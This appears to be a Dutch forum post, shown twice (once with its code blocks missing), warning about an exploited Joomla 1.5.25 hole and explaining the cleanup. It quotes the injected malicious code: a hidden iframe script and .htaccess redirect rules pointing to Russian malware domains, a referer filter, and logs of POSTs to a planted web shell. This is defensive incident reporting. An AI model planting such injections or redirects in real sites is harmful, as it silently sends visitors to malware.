Hallo allemaal,
Ik wil even melden dat er sinds 2 dagen actief een lek word misbruikt in joomla 1.5.25. Waarschijnlijk gaat het om een automatisch procces wat gewoon uiterst gevaarlijk is. Wat het script precies doet is nog niet bekent. Wel weet ik dat het automatisch opnieuw kan uploaden. Updaten naar 1.5.26 zou het probleem grotendeels moeten oplossen. Er worden meerdere russische domeinnamen gebruikt.
Even wat gegevens:
Script word in vrijwel alle javascripts gedropt:
Script word in vrijwel alle .htaccess gedropt:
Log van apache2:
Rechten worden aangepast naar 611.
Ik heb de volgende methode gebruikt om dit op te lossen:
Maak eerst even een bestand in /images/banners/.cache_mit5nt.php waar je bijvoorbeeld een die neerzet. Vervolgens backup je alle data. Open met je favoriete bestandsbewerker (in mijn geval Notepad++) een bestand en doorzoek de volledige site.
Zoek naar het volgende:
Vervang wel even het domein.
Ook in de .htaccess bestanden heeft hij dus bewerkingen gedaan. Zoek daar naar bijvoorbeeld:
Die .htaccess bestanden even leegmaken. Daarna maak je een update naar Joomla! 1.5.26. Upload alles en pas even alle suber administrators het wachtwoord aan en het wachtwoord van de MySQL gebruiker. Als je ook FTP hebt ingesteld kan je dat ook het beste veranderen.
Groetjes sentmen.
Ik wil even melden dat er sinds 2 dagen actief een lek word misbruikt in joomla 1.5.25. Waarschijnlijk gaat het om een automatisch procces wat gewoon uiterst gevaarlijk is. Wat het script precies doet is nog niet bekent. Wel weet ik dat het automatisch opnieuw kan uploaden. Updaten naar 1.5.26 zou het probleem grotendeels moeten oplossen. Er worden meerdere russische domeinnamen gebruikt.
Even wat gegevens:
Script word in vrijwel alle javascripts gedropt:
Code:
document.write('<iframe src="http://triphopfifth.ru/browniessignup.cgi?8" scrolling="auto" frameborder="no" align="center" height="13" width="13"></iframe>');
Script word in vrijwel alle .htaccess gedropt:
Code:
RewriteRule ^(.*)$ http://triphopfifth.ru/browniessignup.cgi?8 R=301,L]
ErrorDocument 500 http://triphopfifth.ru/browniessignup.cgi?8
Log van apache2:
Code:
94.242.219.182 - - [08/Nov/2012:02:59:04 +0100] "POST /images/banners/.cache_mit5nt.php HTTP/1.1" 200 563 "-" "Mozilla/5.0 (Windows NT 5.1; rv:8.0) Gecko/20100101 Firefox/8.0"
158.255.215.121 - - [08/Nov/2012:10:24:54 +0100] "POST /images/banners/.cache_mit5nt.php HTTP/1.1" 200 563 "-" "Mozilla/5.0 (Windows NT 5.1; rv:8.0) Gecko/20100101 Firefox/8.0"
Rechten worden aangepast naar 611.
Ik heb de volgende methode gebruikt om dit op te lossen:
Maak eerst even een bestand in /images/banners/.cache_mit5nt.php waar je bijvoorbeeld een die neerzet. Vervolgens backup je alle data. Open met je favoriete bestandsbewerker (in mijn geval Notepad++) een bestand en doorzoek de volledige site.
Zoek naar het volgende:
Code:
document.write('<iframe src="http://pageloadlifestyle.ru/disksuitevirusspyware.cgi?8" scrolling="auto" frameborder="no" align="center" height="13" width="13"></iframe>');
Ook in de .htaccess bestanden heeft hij dus bewerkingen gedaan. Zoek daar naar bijvoorbeeld:
Code:
RewriteCond %{HTTP_REFERER} ^.*(duckduckgo|ask|google|dogpile|archive|clusty|mahalo|mywebsearch|blekko|lycos|webcrawler|info|infospace|search|excite|goodsearch|altavista|live|msn|aol|yahoo|youtube|wikipedia|infoseek|bing|facebook|twitter|myspace|linkedin|flickr|deviantart|livejournal|tagged|badoo|mylife|ning|pinterest)\.(.*)
Die .htaccess bestanden even leegmaken. Daarna maak je een update naar Joomla! 1.5.26. Upload alles en pas even alle suber administrators het wachtwoord aan en het wachtwoord van de MySQL gebruiker. Als je ook FTP hebt ingesteld kan je dat ook het beste veranderen.
Groetjes sentmen.
Laatst bewerkt: